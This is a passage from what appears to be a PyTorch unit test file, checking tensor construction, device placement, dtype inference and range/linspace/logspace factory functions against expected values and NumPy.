self.assertEqual('cpu',
torch.tensor(torch.ones((2, 3), dtype=torch.float32), device='cpu:0').device.type)
if TEST_NUMPY:
self.assertEqual('cpu', torch.tensor(np.random.randn(2, 3), device='cpu').device.type)
if device_type == 'cuda':
self.assertEqual('cuda:0', str(torch.tensor(5).cuda(0).device))
self.assertEqual('cuda:0', str(torch.tensor(5).cuda('cuda:0').device))
self.assertEqual('cuda:0',
str(torch.tensor(5, dtype=torch.int64, device=0).device))
self.assertEqual('cuda:0',
str(torch.tensor(5, dtype=torch.int64, device='cuda:0').device))
self.assertEqual('cuda:0',
str(torch.tensor(torch.ones((2, 3), dtype=torch.float32), device='cuda:0').device))
if TEST_NUMPY:
self.assertEqual('cuda:0', str(torch.tensor(np.random.randn(2, 3), device='cuda:0').device))
for device in devices:
with torch.cuda.device(device):
device_string = 'cuda:' + str(torch.cuda.current_device())
self.assertEqual(device_string,
str(torch.tensor(5, dtype=torch.int64, device='cuda').device))
with self.assertRaises(RuntimeError):
torch.tensor(5).cuda('cpu')
with self.assertRaises(RuntimeError):
torch.tensor(5).cuda('cpu:0')
if len(devices) > 1:
self.assertEqual('cuda:1', str(torch.tensor(5).cuda(1).device))
self.assertEqual('cuda:1', str(torch.tensor(5).cuda('cuda:1').device))
self.assertEqual('cuda:1',
str(torch.tensor(5, dtype=torch.int64, device=1).device))
self.assertEqual('cuda:1',
str(torch.tensor(5, dtype=torch.int64, device='cuda:1').device))
self.assertEqual('cuda:1',
str(torch.tensor(torch.ones((2, 3), dtype=torch.float32),
device='cuda:1').device))
if TEST_NUMPY:
self.assertEqual('cuda:1',
str(torch.tensor(np.random.randn(2, 3), device='cuda:1').device))
# TODO: this test should be updated
@onlyOnCPUAndCUDA
def test_as_strided_neg(self, device):
error = r'as_strided: Negative strides are not supported at the ' \
r'moment, got strides: \[-?[0-9]+(, -?[0-9]+)*\]'
with self.assertRaisesRegex(RuntimeError, error):
torch.as_strided(torch.ones(3, 3, device=device), (1, 1), (2, -1))
with self.assertRaisesRegex(RuntimeError, error):
torch.as_strided(torch.ones(14, device=device), (2,), (-11,))
# TODO: this test should be updated
def test_zeros(self, device):
res1 = torch.zeros(100, 100, device=device)
res2 = torch.tensor((), device=device)
torch.zeros(100, 100, device=device, out=res2)
self.assertEqual(res1, res2)
boolTensor = torch.zeros(2, 2, device=device, dtype=torch.bool)
expected = torch.tensor([[False, False], [False, False]],
device=device, dtype=torch.bool)
self.assertEqual(boolTensor, expected)
halfTensor = torch.zeros(1, 1, device=device, dtype=torch.half)
expected = torch.tensor([[0.]], device=device, dtype=torch.float16)
self.assertEqual(halfTensor, expected)
bfloat16Tensor = torch.zeros(1, 1, device=device, dtype=torch.bfloat16)
expected = torch.tensor([[0.]], device=device, dtype=torch.bfloat16)
self.assertEqual(bfloat16Tensor, expected)
complexTensor = torch.zeros(2, 2, device=device, dtype=torch.complex64)
expected = torch.tensor([[0., 0.], [0., 0.]], device=device, dtype=torch.complex64)
self.assertEqual(complexTensor, expected)
# TODO: this test should be updated
def test_zeros_out(self, device):
shape = (3, 4)
out = torch.zeros(shape, device=device)
torch.zeros(shape, device=device, out=out)
# change the dtype, layout, device
with self.assertRaises(RuntimeError):
torch.zeros(shape, device=device, dtype=torch.int64, out=out)
with self.assertRaises(RuntimeError):
torch.zeros(shape, device=device, layout=torch.sparse_coo, out=out)
# leave them the same
self.assertEqual(torch.zeros(shape, device=device),
torch.zeros(shape, device=device, dtype=out.dtype, out=out))
self.assertEqual(torch.zeros(shape, device=device),
torch.zeros(shape, device=device, layout=torch.strided, out=out))
self.assertEqual(torch.zeros(shape, device=device),
torch.zeros(shape, device=device, out=out))
# TODO: this test should be updated
def test_ones(self, device):
res1 = torch.ones(100, 100, device=device)
res2 = torch.tensor((), device=device)
torch.ones(100, 100, device=device, out=res2)
self.assertEqual(res1, res2)
# test boolean tensor
res1 = torch.ones(1, 2, device=device, dtype=torch.bool)
expected = torch.tensor([[True, True]], device=device, dtype=torch.bool)
self.assertEqual(res1, expected)
# TODO: this test should be updated
@onlyCPU
def test_constructor_dtypes(self, device):
default_type = torch.Tensor().type()
self.assertIs(torch.Tensor().dtype, torch.get_default_dtype())
self.assertIs(torch.uint8, torch.ByteTensor.dtype)
self.assertIs(torch.float32, torch.FloatTensor.dtype)
self.assertIs(torch.float64, torch.DoubleTensor.dtype)
torch.set_default_tensor_type('torch.FloatTensor')
self.assertIs(torch.float32, torch.get_default_dtype())
self.assertIs(torch.FloatStorage, torch.Storage)
torch.set_default_dtype(torch.float64)
self.assertIs(torch.float64, torch.get_default_dtype())
self.assertIs(torch.DoubleStorage, torch.Storage)
torch.set_default_tensor_type(torch.FloatTensor)
self.assertIs(torch.float32, torch.get_default_dtype())
self.assertIs(torch.FloatStorage, torch.Storage)
if torch.cuda.is_available():
torch.set_default_tensor_type(torch.cuda.FloatTensor)
self.assertIs(torch.float32, torch.get_default_dtype())
self.assertIs(torch.float32, torch.cuda.FloatTensor.dtype)
self.assertIs(torch.cuda.FloatStorage, torch.Storage)
torch.set_default_dtype(torch.float64)
self.assertIs(torch.float64, torch.get_default_dtype())
self.assertIs(torch.cuda.DoubleStorage, torch.Storage)
# don't support integral or sparse default types.
self.assertRaises(TypeError, lambda: torch.set_default_tensor_type('torch.IntTensor'))
self.assertRaises(TypeError, lambda: torch.set_default_dtype(torch.int64))
# don't allow passing dtype to set_default_tensor_type
self.assertRaises(TypeError, lambda: torch.set_default_tensor_type(torch.float32))
torch.set_default_tensor_type(default_type)
# TODO: this test should be updated
@onlyCPU
def test_constructor_device_legacy(self, device):
self.assertRaises(RuntimeError, lambda: torch.FloatTensor(device='cuda'))
self.assertRaises(RuntimeError, lambda: torch.FloatTensor(torch.Size([2, 3, 4]), device='cuda'))
self.assertRaises(RuntimeError, lambda: torch.FloatTensor((2.0, 3.0), device='cuda'))
self.assertRaises(RuntimeError, lambda: torch.Tensor(device='cuda'))
self.assertRaises(RuntimeError, lambda: torch.Tensor(torch.Size([2, 3, 4]), device='cuda'))
self.assertRaises(RuntimeError, lambda: torch.Tensor((2.0, 3.0), device='cuda'))
x = torch.randn((3,), device='cpu')
self.assertRaises(RuntimeError, lambda: x.new(device='cuda'))
self.assertRaises(RuntimeError, lambda: x.new(torch.Size([2, 3, 4]), device='cuda'))
self.assertRaises(RuntimeError, lambda: x.new((2.0, 3.0), device='cuda'))
if torch.cuda.is_available():
self.assertRaises(RuntimeError, lambda: torch.cuda.FloatTensor(device='cpu'))
self.assertRaises(RuntimeError, lambda: torch.cuda.FloatTensor(torch.Size([2, 3, 4]), device='cpu'))
self.assertRaises(RuntimeError, lambda: torch.cuda.FloatTensor((2.0, 3.0), device='cpu'))
default_type = torch.Tensor().type()
torch.set_default_tensor_type(torch.cuda.FloatTensor)
self.assertRaises(RuntimeError, lambda: torch.Tensor(device='cpu'))
self.assertRaises(RuntimeError, lambda: torch.Tensor(torch.Size([2, 3, 4]), device='cpu'))
self.assertRaises(RuntimeError, lambda: torch.Tensor((2.0, 3.0), device='cpu'))
torch.set_default_tensor_type(torch.cuda.FloatTensor)
torch.set_default_tensor_type(default_type)
x = torch.randn((3,), device='cuda')
self.assertRaises(RuntimeError, lambda: x.new(device='cpu'))
self.assertRaises(RuntimeError, lambda: x.new(torch.Size([2, 3, 4]), device='cpu'))
self.assertRaises(RuntimeError, lambda: x.new((2.0, 3.0), device='cpu'))
# TODO: this test should be updated
@suppress_warnings
@onlyCPU
def test_tensor_factory(self, device):
# TODO: This test probably doesn't make too much sense now that
# torch.tensor has been established for a while; it makes more
# sense to test the legacy behavior in terms of the new behavior
expected = torch.Tensor([1, 1])
# test data
res1 = torch.tensor([1, 1])
self.assertEqual(res1, expected, exact_dtype=False)
res1 = torch.tensor([1, 1], dtype=torch.int)
self.assertEqual(res1, expected, exact_dtype=False)
self.assertIs(torch.int, res1.dtype)
# test copy
res2 = torch.tensor(expected)
self.assertEqual(res2, expected)
res2[1] = 2
self.assertEqual(expected, torch.ones_like(expected))
res2 = torch.tensor(expected, dtype=torch.int)
self.assertEqual(res1, expected, exact_dtype=False)
self.assertIs(torch.int, res1.dtype)
# test copy with numpy
if TEST_NUMPY:
for dtype in [np.float64, np.int64, np.int8, np.uint8]:
a = np.array([5.]).astype(dtype)
res1 = torch.tensor(a)
self.assertEqual(5., res1[0].item())
a[0] = 7.
self.assertEqual(5., res1[0].item())
# test boolean tensor
a = torch.tensor([True, True, False, True, True], dtype=torch.bool)
b = torch.tensor([-1, -1.1, 0, 1, 1.1], dtype=torch.bool)
self.assertEqual(a, b)
c = torch.tensor([-0.1, -1.1, 0, 1, 0.1], dtype=torch.bool)
self.assertEqual(a, c)
d = torch.tensor((-.3, 0, .3, 1, 3 / 7), dtype=torch.bool)
e = torch.tensor((True, False, True, True, True), dtype=torch.bool)
self.assertEqual(e, d)
f = torch.tensor((-1, 0, -1.1, 1, 1.1), dtype=torch.bool)
self.assertEqual(e, f)
int64_max = torch.iinfo(torch.int64).max
int64_min = torch.iinfo(torch.int64).min
float64_max = torch.finfo(torch.float64).max
float64_min = torch.finfo(torch.float64).min
g_1 = torch.tensor((float('nan'), 0, int64_min, int64_max, int64_min - 1), dtype=torch.bool)
self.assertEqual(e, g_1)
g_2 = torch.tensor((int64_max + 1, 0, (int64_max + 1) * 2, (int64_max + 1) * 2 + 1, float64_min), dtype=torch.bool)
self.assertEqual(e, g_2)
g_3 = torch.tensor((float64_max, 0, float64_max + 1, float64_min - 1, float64_max + 1e291), dtype=torch.bool)
self.assertEqual(e, g_3)
h = torch.tensor([True, False, False, True, False, True, True], dtype=torch.bool)
i = torch.tensor([1e-323, 1e-324, 0j, 1e-323j, 1e-324j, 1 + 2j, -1j], dtype=torch.bool)
self.assertEqual(h, i)
j = torch.tensor((True, True, True, True), dtype=torch.bool)
k = torch.tensor((1e323, -1e323, float('inf'), -float('inf')), dtype=torch.bool)
self.assertEqual(j, k)
# TODO: this test should be updated
@suppress_warnings
@onlyCPU
def test_tensor_factory_copy_var(self, device):
def check_copy(copy, is_leaf, requires_grad, data_ptr=None):
if data_ptr is None:
data_ptr = copy.data_ptr
self.assertEqual(copy, source, exact_dtype=False)
self.assertTrue(copy.is_leaf == is_leaf)
self.assertTrue(copy.requires_grad == requires_grad)
self.assertTrue(copy.data_ptr == data_ptr)
source = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
# test torch.tensor()
check_copy(torch.tensor(source), True, False)
check_copy(torch.tensor(source, requires_grad=False), True, False)
check_copy(torch.tensor(source, requires_grad=True), True, True)
# test tensor.new_tensor()
copy = torch.randn(1)
check_copy(copy.new_tensor(source), True, False)
check_copy(copy.new_tensor(source, requires_grad=False), True, False)
check_copy(copy.new_tensor(source, requires_grad=True), True, True)
# test torch.as_tensor()
check_copy(torch.as_tensor(source), source.is_leaf, source.requires_grad, source.data_ptr) # not copy
check_copy(torch.as_tensor(source, dtype=torch.float), False, True) # copy and keep the graph
# TODO: this test should be updated
@onlyCPU
def test_tensor_factory_type_inference(self, device):
def test_inference(default_dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(default_dtype)
default_complex_dtype = torch.complex64 if default_dtype == torch.float32 else torch.complex128
self.assertIs(default_dtype, torch.tensor(()).dtype)
self.assertIs(default_dtype, torch.tensor(5.).dtype)
self.assertIs(torch.int64, torch.tensor(5).dtype)
self.assertIs(torch.bool, torch.tensor(True).dtype)
self.assertIs(torch.int32, torch.tensor(5, dtype=torch.int32).dtype)
self.assertIs(default_dtype, torch.tensor(((7, 5), (9, 5.))).dtype)
self.assertIs(default_dtype, torch.tensor(((5., 5), (3, 5))).dtype)
self.assertIs(torch.int64, torch.tensor(((5, 3), (3, 5))).dtype)
self.assertIs(default_complex_dtype, torch.tensor(((5, 3 + 2j), (3, 5 + 4j))).dtype)
if TEST_NUMPY:
self.assertIs(torch.float64, torch.tensor(np.array(())).dtype)
self.assertIs(torch.float64, torch.tensor(np.array(5.)).dtype)
if np.array(5).dtype == np.int64: # np long, which can be 4 bytes (e.g. on windows)
self.assertIs(torch.int64, torch.tensor(np.array(5)).dtype)
else:
self.assertIs(torch.int32, torch.tensor(np.array(5)).dtype)
self.assertIs(torch.uint8, torch.tensor(np.array(3, dtype=np.uint8)).dtype)
self.assertIs(default_dtype, torch.tensor(((7, np.array(5)), (np.array(9), 5.))).dtype)
self.assertIs(torch.float64, torch.tensor(((7, 5), (9, np.array(5.)))).dtype)
self.assertIs(torch.int64, torch.tensor(((5, np.array(3)), (np.array(3), 5))).dtype)
torch.set_default_dtype(saved_dtype)
test_inference(torch.float64)
test_inference(torch.float32)
# TODO: this test should be updated
@suppress_warnings
@onlyCPU
def test_new_tensor(self, device):
expected = torch.autograd.Variable(torch.ByteTensor([1, 1]))
# test data
res1 = expected.new_tensor([1, 1])
self.assertEqual(res1, expected)
res1 = expected.new_tensor([1, 1], dtype=torch.int)
self.assertEqual(res1, expected, exact_dtype=False)
self.assertIs(torch.int, res1.dtype)
# test copy
res2 = expected.new_tensor(expected)
self.assertEqual(res2, expected)
res2[1] = 2
self.assertEqual(expected, torch.ones_like(expected))
res2 = expected.new_tensor(expected, dtype=torch.int)
self.assertEqual(res2, expected, exact_dtype=False)
self.assertIs(torch.int, res2.dtype)
# test copy with numpy
if TEST_NUMPY:
a = np.array([5.])
res1 = torch.tensor(a)
res1 = res1.new_tensor(a)
self.assertEqual(5., res1[0].item())
a[0] = 7.
self.assertEqual(5., res1[0].item())
if torch.cuda.device_count() >= 2:
expected = expected.cuda(1)
res1 = expected.new_tensor([1, 1])
self.assertEqual(res1.get_device(), expected.get_device())
res1 = expected.new_tensor([1, 1], dtype=torch.int)
self.assertIs(torch.int, res1.dtype)
self.assertEqual(res1.get_device(), expected.get_device())
res2 = expected.new_tensor(expected)
self.assertEqual(res2.get_device(), expected.get_device())
res2 = expected.new_tensor(expected, dtype=torch.int)
self.assertIs(torch.int, res1.dtype)
self.assertEqual(res2.get_device(), expected.get_device())
res2 = expected.new_tensor(expected, dtype=torch.int, device=0)
self.assertIs(torch.int, res1.dtype)
self.assertEqual(res2.get_device(), 0)
res1 = expected.new_tensor(1)
self.assertEqual(res1.get_device(), expected.get_device())
res1 = expected.new_tensor(1, dtype=torch.int)
self.assertIs(torch.int, res1.dtype)
self.assertEqual(res1.get_device(), expected.get_device())
# TODO: this test should be updated
@onlyCPU
def test_as_tensor(self, device):
# from python data
x = [[0, 1], [2, 3]]
self.assertEqual(torch.tensor(x), torch.as_tensor(x))
self.assertEqual(torch.tensor(x, dtype=torch.float32), torch.as_tensor(x, dtype=torch.float32))
# python data with heterogeneous types
z = [0, 'torch']
with self.assertRaisesRegex(TypeError, "invalid data type"):
torch.tensor(z)
torch.as_tensor(z)
# python data with self-referential lists
z = [0]
z += [z]
with self.assertRaisesRegex(TypeError, "self-referential lists are incompatible"):
torch.tensor(z)
torch.as_tensor(z)
z = [[1, 2], z]
with self.assertRaisesRegex(TypeError, "self-referential lists are incompatible"):
torch.tensor(z)
torch.as_tensor(z)
# from tensor (doesn't copy unless type is different)
y = torch.tensor(x)
self.assertIs(y, torch.as_tensor(y))
self.assertIsNot(y, torch.as_tensor(y, dtype=torch.float32))
if torch.cuda.is_available():
self.assertIsNot(y, torch.as_tensor(y, device='cuda'))
y_cuda = y.to('cuda')
self.assertIs(y_cuda, torch.as_tensor(y_cuda))
self.assertIs(y_cuda, torch.as_tensor(y_cuda, device='cuda'))
if TEST_NUMPY:
# doesn't copy
for dtype in [np.float64, np.int64, np.int8, np.uint8]:
n = np.random.rand(5, 6).astype(dtype)
n_astensor = torch.as_tensor(n)
self.assertEqual(torch.tensor(n), n_astensor)
n_astensor[0][0] = 25.7
self.assertEqual(torch.tensor(n), n_astensor)
# changing dtype causes copy
n = np.random.rand(5, 6).astype(np.float32)
n_astensor = torch.as_tensor(n, dtype=torch.float64)
self.assertEqual(torch.tensor(n, dtype=torch.float64), n_astensor)
n_astensor[0][1] = 250.8
self.assertNotEqual(torch.tensor(n, dtype=torch.float64), n_astensor)
# changing device causes copy
if torch.cuda.is_available():
n = np.random.randn(5, 6)
n_astensor = torch.as_tensor(n, device='cuda')
self.assertEqual(torch.tensor(n, device='cuda'), n_astensor)
n_astensor[0][2] = 250.9
self.assertNotEqual(torch.tensor(n, device='cuda'), n_astensor)
# TODO: this test should be updated
@suppress_warnings
def test_range(self, device):
res1 = torch.range(0, 1, device=device)
res2 = torch.tensor((), device=device)
torch.range(0, 1, device=device, out=res2)
self.assertEqual(res1, res2, atol=0, rtol=0)
# Check range for non-contiguous tensors.
x = torch.zeros(2, 3, device=device)
torch.range(0, 3, device=device, out=x.narrow(1, 1, 2))
res2 = torch.tensor(((0, 0, 1), (0, 2, 3)), device=device, dtype=torch.float32)
self.assertEqual(x, res2, atol=1e-16, rtol=0)
# Check negative
res1 = torch.tensor((1, 0), device=device, dtype=torch.float32)
res2 = torch.tensor((), device=device)
torch.range(1, 0, -1, device=device, out=res2)
self.assertEqual(res1, res2, atol=0, rtol=0)
# Equal bounds
res1 = torch.ones(1, device=device)
res2 = torch.tensor((), device=device)
torch.range(1, 1, -1, device=device, out=res2)
self.assertEqual(res1, res2, atol=0, rtol=0)
torch.range(1, 1, 1, device=device, out=res2)
self.assertEqual(res1, res2, atol=0, rtol=0)
# TODO: this test should be updated
def test_range_warning(self, device):
with warnings.catch_warnings(record=True) as w:
torch.range(0, 10, device=device)
self.assertEqual(len(w), 1)
# TODO: this test should be updated
@onlyCPU
def test_arange(self, device):
res = torch.tensor(range(10000))
res1 = torch.arange(0, 10000) # Use a larger number so vectorized code can be triggered
res2 = torch.tensor([], dtype=torch.int64)
torch.arange(0, 10000, out=res2)
self.assertEqual(res, res1, atol=0, rtol=0)
self.assertEqual(res, res2, atol=0, rtol=0)
# Vectorization on non-contiguous tensors
res = torch.rand(3, 3, 300000).to(torch.int64)
res = res.permute(2, 0, 1)
torch.arange(0, 300000 * 3 * 3, out=res)
self.assertEqual(res.flatten(), torch.arange(0, 300000 * 3 * 3))
# Check arange with only one argument
res1 = torch.arange(10)
res2 = torch.arange(0, 10)
self.assertEqual(res1, res2, atol=0, rtol=0)
# Check arange for non-contiguous tensors.
x = torch.zeros(2, 3)
torch.arange(0, 4, out=x.narrow(1, 1, 2))
res2 = torch.Tensor(((0, 0, 1), (0, 2, 3)))
self.assertEqual(x, res2, atol=1e-16, rtol=0)
# Check negative
res1 = torch.Tensor((1, 0))
res2 = torch.Tensor()
torch.arange(1, -1, -1, out=res2)
self.assertEqual(res1, res2, atol=0, rtol=0)
# Equal bounds
res1 = torch.ones(1)
res2 = torch.Tensor()
torch.arange(1, 0, -1, out=res2)
self.assertEqual(res1, res2, atol=0, rtol=0)
torch.arange(1, 2, 1, out=res2)
self.assertEqual(res1, res2, atol=0, rtol=0)
# FloatTensor
res1 = torch.arange(0.6, 0.89, 0.1, out=torch.FloatTensor())
self.assertEqual(res1, [0.6, 0.7, 0.8])
res1 = torch.arange(1, 10, 0.3, out=torch.FloatTensor())
self.assertEqual(res1.size(0), 30)
self.assertEqual(res1[0], 1)
self.assertEqual(res1[29], 9.7)
# DoubleTensor
res1 = torch.arange(0.6, 0.89, 0.1, out=torch.DoubleTensor())
self.assertEqual(res1, [0.6, 0.7, 0.8])
res1 = torch.arange(1, 10, 0.3, out=torch.DoubleTensor())
self.assertEqual(res1.size(0), 30)
self.assertEqual(res1[0], 1)
self.assertEqual(res1[29], 9.7)
# Bool Input matching numpy semantics
r = torch.arange(True)
self.assertEqual(r[0], 0)
r2 = torch.arange(False)
self.assertEqual(len(r2), 0)
self.assertEqual(r.dtype, torch.int64)
self.assertEqual(r2.dtype, torch.int64)
# Check that it's exclusive
r = torch.arange(0, 5)
self.assertEqual(r.min(), 0)
self.assertEqual(r.max(), 4)
self.assertEqual(r.numel(), 5)
r = torch.arange(0, 5, 2)
self.assertEqual(r.min(), 0)
self.assertEqual(r.max(), 4)
self.assertEqual(r.numel(), 3)
r1 = torch.arange(0, 5 + 1e-6)
# NB: without the dtype, we'll infer output type to be int64
r2 = torch.arange(0, 5, dtype=torch.float32)
r3 = torch.arange(0, 5 - 1e-6)
self.assertEqual(r1[:-1], r2, atol=0, rtol=0)
self.assertEqual(r2, r3, atol=0, rtol=0)
r1 = torch.arange(10, -1 + 1e-6, -1)
# NB: without the dtype, we'll infer output type to be int64
r2 = torch.arange(10, -1, -1, dtype=torch.float32)
r3 = torch.arange(10, -1 - 1e-6, -1)
self.assertEqual(r1, r2, atol=0, rtol=0)
self.assertEqual(r2, r3[:-1], atol=0, rtol=0)
# Test Rounding Errors
line = torch.zeros(size=(1, 49))
self.assertWarnsRegex(UserWarning, 'The out tensor will be resized',
lambda: torch.arange(-1, 1, 2. / 49, dtype=torch.float32, out=line))
self.assertEqual(line.shape, [50])
x = torch.empty(1).expand(10)
self.assertRaises(RuntimeError, lambda: torch.arange(10, out=x))
msg = "unsupported range"
self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(0, float('inf')))
self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(float('inf')))
for device in torch.testing.get_all_device_types():
self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(-5, float('nan'), device=device))
# check with step size
self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(0, float('-inf'), -1, device=device))
self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(0, float('inf'), device=device))
self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(float('-inf'), 10, device=device))
self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(float('nan'), 10, device=device))
self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(float('inf'), device=device))
self.assertRaisesRegex(RuntimeError, msg, lambda: torch.arange(float('nan'), device=device))
self.assertRaisesRegex(
RuntimeError, "overflow",
lambda: torch.arange(1.175494351e-38, 3.402823466e+38, device=device))
# check that it holds a consistent output shape on precision-cornered step sizes
d = torch.arange(-4.0, 4.0, 0.01, dtype=torch.float32, device=device)
self.assertEqual(d.shape[0], 800)
# TODO: this test should be updated
@onlyCPU
def test_arange_inference(self, device):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(torch.float32)
# end only
self.assertIs(torch.float32, torch.arange(1.).dtype)
self.assertIs(torch.float32, torch.arange(torch.tensor(1.)).dtype)
self.assertIs(torch.float32, torch.arange(torch.tensor(1., dtype=torch.float64)).dtype)
self.assertIs(torch.int64, torch.arange(1).dtype)
self.assertIs(torch.int64, torch.arange(torch.tensor(1)).dtype)
self.assertIs(torch.int64, torch.arange(torch.tensor(1, dtype=torch.int16)).dtype)
# start, end, [step]
self.assertIs(torch.float32, torch.arange(1., 3).dtype)
self.assertIs(torch.float32, torch.arange(torch.tensor(1., dtype=torch.float64), 3).dtype)
self.assertIs(torch.float32, torch.arange(1, 3.).dtype)
self.assertIs(torch.float32, torch.arange(torch.tensor(1, dtype=torch.int16), torch.tensor(3.)).dtype)
self.assertIs(torch.float32, torch.arange(1, 3, 1.).dtype)
self.assertIs(torch.float32,
torch.arange(torch.tensor(1),
torch.tensor(3, dtype=torch.int16),
torch.tensor(1., dtype=torch.float64)).dtype)
self.assertIs(torch.int64, torch.arange(1, 3).dtype)
self.assertIs(torch.int64, torch.arange(torch.tensor(1), 3).dtype)
self.assertIs(torch.int64, torch.arange(torch.tensor(1), torch.tensor(3, dtype=torch.int16)).dtype)
self.assertIs(torch.int64, torch.arange(1, 3, 1).dtype)
self.assertIs(torch.int64,
torch.arange(torch.tensor(1),
torch.tensor(3),
torch.tensor(1, dtype=torch.int16)).dtype)
torch.set_default_dtype(saved_dtype)
def test_empty_strided(self, device):
for shape in [(2, 3, 4), (0, 2, 0)]:
# some of these cases are pretty strange, just verifying that if as_strided
# allows them then empty_strided can as well.
for strides in [(12, 4, 1), (2, 4, 6), (0, 0, 0)]:
empty_strided = torch.empty_strided(shape, strides, device=device)
# as_strided checks the storage size is big enough to support such a strided tensor;
# instead of repeating this calculation, we just use empty_strided which does the same
# calculation when setting the storage size.
as_strided = torch.empty(empty_strided.storage().size(),
device=device).as_strided(shape, strides)
self.assertEqual(empty_strided.shape, as_strided.shape)
self.assertEqual(empty_strided.stride(), as_strided.stride())
def test_strided_mismatched_stride_shape(self, device):
for shape, strides in [((1, ), ()), ((1, 2), (1, ))]:
with self.assertRaisesRegex(RuntimeError, "mismatch in length of strides and shape"):
torch.tensor(0.42, device=device).as_strided(shape, strides)
with self.assertRaisesRegex(RuntimeError, "mismatch in length of strides and shape"):
torch.tensor(0.42, device=device).as_strided_(shape, strides)
def test_empty_tensor_props(self, device):
sizes = [(0,), (0, 3), (5, 0), (5, 0, 3, 0, 2), (0, 3, 0, 2), (0, 5, 0, 2, 0)]
for size in sizes:
x = torch.empty(tuple(size), device=device)
self.assertEqual(size, x.shape)
self.assertTrue(x.is_contiguous())
size_ones_instead_of_zeros = (x if x != 0 else 1 for x in size)
y = torch.empty(tuple(size_ones_instead_of_zeros), device=device)
self.assertEqual(x.stride(), y.stride())
def test_eye(self, device):
for dtype in torch.testing.get_all_dtypes():
if dtype == torch.bfloat16:
continue
for n, m in product([3, 5, 7], repeat=2):
# Construct identity using diagonal and fill
res1 = torch.eye(n, m, device=device, dtype=dtype)
naive_eye = torch.zeros(n, m, dtype=dtype, device=device)
naive_eye.diagonal(dim1=-2, dim2=-1).fill_(1)
self.assertEqual(naive_eye, res1)
# Check eye_out outputs
res2 = torch.empty(0, device=device, dtype=dtype)
torch.eye(n, m, out=res2)
self.assertEqual(res1, res2)
@unittest.skipIf(not TEST_NUMPY, "NumPy not found")
@precisionOverride({torch.float: 1e-8, torch.double: 1e-10})
@dtypes(*(torch.testing.get_all_fp_dtypes(include_half=False, include_bfloat16=False) +
torch.testing.get_all_complex_dtypes()))
def test_linspace_vs_numpy(self, device, dtype):
start = -0.0316082797944545745849609375 + (0.8888888888j if dtype.is_complex else 0)
end = .0315315723419189453125 + (0.444444444444j if dtype.is_complex else 0)
for steps in [1, 2, 3, 5, 11, 256, 257, 2**22]:
t = torch.linspace(start, end, steps, device=device, dtype=dtype)
a = np.linspace(start, end, steps, dtype=torch_to_numpy_dtype_dict[dtype])
t = t.cpu()
self.assertEqual(t, torch.from_numpy(a))
self.assertTrue(t[0].item() == a[0])
self.assertTrue(t[steps - 1].item() == a[steps - 1])
@unittest.skipIf(not TEST_NUMPY, "NumPy not found")
@precisionOverride({torch.float: 1e-6, torch.double: 1e-10})
@dtypes(torch.float, torch.double)
def test_logspace_vs_numpy(self, device, dtype):
start = -0.0316082797944545745849609375
end = .0315315723419189453125
for steps in [1, 2, 3, 5, 11, 256, 257, 2**22]:
t = torch.logspace(start, end, steps, device=device, dtype=dtype)
a = np.logspace(start, end, steps, dtype=torch_to_numpy_dtype_dict[dtype])
t = t.cpu()
self.assertEqual(t, torch.from_numpy(a))
self.assertEqual(t[0], a[0])
self.assertEqual(t[steps - 1], a[steps - 1])
@largeCUDATensorTest('16GB')
def test_range_factories_64bit_indexing(self, device):
bigint = 2 ** 31 + 1
t = torch.arange(bigint, dtype=torch.long, device=device)
self.assertEqual(t[-1].item(), bigint - 1)
del t
t = torch.linspace(0, 1, bigint, dtype=torch.float, device=device)
self.assertEqual(t[-1].item(), 1)
del t
t = torch.logspace(0, 1, bigint, 2, dtype=torch.float, device=device)
self.assertEqual(t[-1].item(), 2)
del t
@onlyOnCPUAndCUDA
def test_tensor_ctor_device_inference(self, device):
torch_device = torch.device(device)
values = torch.tensor((1, 2, 3), device=device)
# Tests tensor and as_tensor
# Note: warnings are suppressed (suppresses warnings)
for op in (torch.tensor, torch.as_tensor):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertEqual(op(values).device, torch_device)
self.assertEqual(op(values, dtype=torch.float64).device, torch_device)
if self.device_type == 'cuda':
with torch.cuda.device(device):
self.assertEqual(op(values.cpu()).device, torch.device('cpu'))
# Tests sparse ctor
indices = torch.tensor([[0, 1, 1],
[2, 0, 1],
[2, 1, 0]], device=device)
sparse_size = (3, 3, 3)
sparse_default = torch.sparse_coo_tensor(indices, values, sparse_size)
self.assertEqual(sparse_default.device, torch_device)
sparse_with_dtype = torch.sparse_coo_tensor(indices, values, sparse_size, dtype=torch.float64)
self.assertEqual(sparse_with_dtype.device, torch_device)
if self.device_type == 'cuda':
with torch.cuda.device(device):
sparse_with_dtype = torch.sparse_coo_tensor(indices.cpu(), values.cpu(),
sparse_size, dtype=torch.float64)
self.assertEqual(sparse_with_dtype.device, torch.device('cpu'))
def test_tensor_factories_empty(self, device):
# ensure we can create empty tensors from each factory function
shapes = [(5, 0, 1), (0,), (0, 0, 1, 0, 2, 0, 0)]
for shape in shapes:
for dt in torch.testing.get_all_dtypes():
self.assertEqual(shape, torch.zeros(shape, device=device, dtype=dt).shape)
self.assertEqual(shape, torch.zeros_like(torch.zeros(shape, device=device, dtype=dt)).shape)
self.assertEqual(shape, torch.full(shape, 3, device=device, dtype=dt).shape)
self.assertEqual(shape, torch.full_like(torch.zeros(shape, device=device, dtype=dt), 3).shape)
self.assertEqual(shape, torch.ones(shape, device=device, dtype=dt).shape)
self.assertEqual(shape, torch.ones_like(torch.zeros(shape, device=device, dtype=dt)).shape)
self.assertEqual(shape, torch.empty(shape, device=device, dtype=dt).shape)
self.assertEqual(shape, torch.empty_like(torch.zeros(shape, device=device, dtype=dt)).shape)
self.assertEqual(shape, torch.empty_strided(shape, (0,) * len(shape), device=device, dtype=dt).shape)
if dt == torch.bfloat16 and device.startswith('cuda') and IS_WINDOWS:
# TODO: https://github.com/pytorch/pytorch/issues/33793
self.assertRaises(RuntimeError, lambda: torch.randint(6, shape, device=device, dtype=dt).shape)
elif dt == torch.bool:
